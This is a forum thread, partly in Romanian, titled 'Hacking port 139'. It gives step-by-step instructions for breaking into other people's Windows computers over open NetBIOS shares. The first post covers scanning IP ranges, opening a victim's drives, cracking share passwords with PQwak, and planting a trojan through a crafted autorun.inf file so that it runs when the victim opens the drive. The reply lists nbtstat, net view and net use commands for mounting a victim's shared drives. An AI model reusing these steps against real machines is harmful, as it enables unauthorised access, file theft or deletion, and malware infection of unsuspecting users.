Jump to content
DS

HACKING PORT 139

Recommended Posts

1. Ce este NetBIOS-ul.

2. NetBIOS in Windows.

3. Gasirea punctului slab.

4. Exploatarea punctului slab.

5. Cum treci de parola.

6. Cum poti determina un sistem de operare sa activeze optiunea de share pe toate partitiile sale.

____________________________________________________________________________________________________________________________

1. NetBIOS (Network Basic Input/Output System) este un concept operational realizat de IBM si Sytek realizat pentru a indeplini rolul de API (Application

Programming Interface) pentru ca o aplicatie sa poata accesa resursele unei retele. Pe scurt NetBIOS permite aplicatiilor sa comunice cu o retea.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2. NetBIOS in Windows. Un computer poate fi accesat cu NetBIOS daca are deschis portul 139. Acest port (139) este cel mai periculos port de pe internet. Toate fisierele si imprimantele ce au pornita optiunea de share pe un sistem Windows ruleaza pe acest port. Aproximativ 10% din totalitatea utilizatorilor de Internet au hard disk-urile expuse prin intermediul acestui port. Portul acesta (139) este primul port la care vrea sa se conecteze un Hacker si tot acest port este cel blocat de un Firewall.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3. Gasirea punctului slab. Pentru a gasi un computer vulnerabil trebuie sa scanati o retea sau o arie de IP-uri pentru a vedea care are portul 139 deschis. Pentru acest lucru recomand folosirea programului IPScan (acest program se poate gasi pe CD-ul nostru). Odata ce se termina scanarea si se gasesc IP-uri vulnerabile se trece la punctul 4.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

4. Exploatarea punctului slab. Dupa alegerea IP-ului vulnerabil se trece la conectarea cu acesta astfel:

START > RUN > In casuta de RUN se introduce comanda xxx.xxx.xxx.xxx apoi se da clic pe OK.

ATENTIE xxx.xxx.xxx.xxx este IP-ul gasit de voi asa ca inlocuiti x-urile cu IP-ul gasit

Daca totul a mers bine ar trebui sa se deschida o fereastra cu continutul hard disk-ului victimei. Acum puteti vedea, realiza download sau uploade sau chiar sterge fisierele de pe computerul victimei.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5. Cum treci de parola. Se poate intampla uneori ca computerul la care incerci sa te conectezi sa fie protejat de o parola. In acest caz trebuie sa folosesti programul PQwak (acest program se poate gasi pe CD-ul nostru). In acest program nu trebuie decat sa introduci IP-ul si numele de share. Numele de share este numele folder-ului care este protejat de parola. Dupa ce ati introdus aceste lucruri trebuie doar sa urmariti cum lucreaza PQwak.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6. Cum poti determina un sistem de operare sa activeze optiunea de share pe toate partitiile sale. Daca partitia care are activata obtiunea de share este (C: D: etc.) atunci poti pune un troian care-ti poate oferi accesul la restul partitiilor si chiar la intregul computer. Pentru a realiza acest lucru trebuie creat un fisier ce va purta numele de autorun.inf Pentru a realiza acest fisier trebuie sa creati un fisier txt care sa contina urmatoarele:

----------------------------------------------------------------------------------------------------------------------------------------------------------------------

CELE SCRISE MAI JOS TREBUIESC COPIATE FARA MODIFICARI.

----------------------------------------------------------------------------------------------------------------------------------------------------------------------

[autorun]

open=autoexec.bak.exe

----------------------------------------------------------------------------------------------------------------------------------------------------------------------

Dupa care se salveaza fisierul txt modificandu-se extensia din .txt in .inf

Apoi cu ajutorul unui Troian (pe cd-ul nostru puteti gasi multe astfel de programe) se realizeaza un troian numit autoexec.bak.exe

Acum cand cele doua fisiere sunt gata trebuie sa le copiem in directorul principal adica in radacina. Spre exemplu daca avem acces la partitia C: atunci fisierele noastre vor fi copiate direct pe aceasta partitie fara sa fie puse in folder.

Acum nu trebuie decat sa asteptati ca victima sa acceseze partitia in care ati pus cele doua fisiere. Odata accesata acesta partitie troianul se va executa oferind acces la tot computerul.

Link to comment
Share on other sites

On English:

It is a better way to hack netbios, its easier, quicker, and more user friendly.

First you port scan. You look for people with the port 139 on.

If they do, they might be hackable.

Open DOS, or cmd.exe (depending on your OS). Put this in c:windows>nbtstat -a xxx.xxx.xxx.xxx

You will see one of two things.

1. Host not found

This means that you can't hack them. (With your skills)

2.Something like this:

NetBIOS Remote Machine Name Table

Name Type Status

-------------------------------------------------------------------------------------------------

user <00> UNIQUE Registered

workgroup <00> GROUP Registered

user <03> UNIQUE Registered

user <20> UNIQUE Registered

MAC Address = 00-02-44-14-23-E6

See the little 20? That means their sharing something there.

Next we put c:windows>net view xxx.xxx.xxx.xxx

This will show the shared drives, it will look something like this

Shared resources at xxx.xxx.xxx.xxx

ComputerNameGoesHere

Share name Type Used as Comment

-----------------------------------------------------------------------------------------------

CDISK Disk

This means they are sharing their C drive.

To put the drive on your "My Computer" we will use this command

c:windows>net use k: xxx.xxx.xxx.xxxCDISK

The k: is the name to put as the drive name on your "My Computer". You can use any letter not currently used in your

"My Computer". The CDISK part is the name of the drive that was listed in the net use command. So if net use table

looked like this:

Shared resources at xxx.xxx.xxx.xxx

ComputerNameGoesHere

Share name Type Used as Comment

-----------------------------------------------------------------------------------------------

FDISK Disk

that means we would put c:windows>net use k: xxx.xxx.xxx.xxxFDISK

Enjoy!!!

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...